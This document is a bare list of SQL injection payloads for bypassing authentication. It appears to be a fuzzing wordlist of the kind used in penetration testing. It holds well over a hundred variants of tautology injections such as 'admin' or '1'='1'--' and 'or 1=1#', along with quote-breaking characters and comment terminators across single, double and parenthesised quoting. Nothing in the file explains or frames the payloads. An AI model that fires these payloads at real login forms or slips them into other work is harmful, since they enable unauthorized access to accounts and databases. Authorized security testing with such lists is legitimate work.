" "
"&"
"*"
"-"
"^"
' '
'&'
'*'
'-'
'--' / "--" 
'--' / "–"
'^'
-'
==
/1#\
1') and '1'='1--
1'or'1'='1
admin" #
admin" --
admin"/*
admin' #
admin' --
admin'/*
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin"or 1=1 or ""="
admin'or 1=1 or ''='
and 1=1
and 1=1--
' and 'one'='one
' and 'one'='one--
hi" or 1=1 --
hi' or 1=1 --
hi" or "a"="a
" or ""="
') or ('')=('
')) or ((''))=(('
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""^"
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''='
' or ''^'
'' or ''='
'=' 'or'
" or 0=0 #
" or 0=0 --
' or 0=0 #
' or 0=0 --
or 0=0 #
or 0=0 --
" or 1--
') or 1--
' or 1--
" or 1=1--
' or '1'='1
' or 1=1--
'or'1=1'
'or'1=1'/
) or '1'='1--
) or ('1'='1--
or '1'='1
or 1=1
or 1=1#
or 1=1--
or 1=1/*
" or "a"="a
") or ("a"="a
' or a=a--
') or ('a'='a
' or 'one'='one
' or 'one'='one--
" or true--
") or true--
" or true--
") or true--
' or true--
'' or true--'
') or true--
or true--
" or "x"="
') or ('x')=('
')) or (('x'))=(('
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 'x'='x
') or ('x')=('x
') or ('x'='x
')) or (('x'))=(('x
